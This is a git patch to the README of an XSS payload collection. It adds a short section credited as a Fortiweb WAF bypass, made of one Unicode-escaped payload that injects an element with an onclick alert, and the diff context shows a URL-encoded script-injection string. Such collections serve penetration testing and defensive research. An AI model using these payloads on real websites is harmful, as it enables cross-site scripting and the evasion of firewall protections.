From 03a0bda20d1da27f9038b5e7bdef048350d3bdce Mon Sep 17 00:00:00 2001 From: "reza.duty" Date: Tue, 9 Jun 2020 20:05:32 +0430 Subject: [PATCH] Update README.md --- XSS Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7b28ee9..2939b24 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -1062,6 +1062,11 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld ``` +### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019 + +```javascript +\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e +``` ## References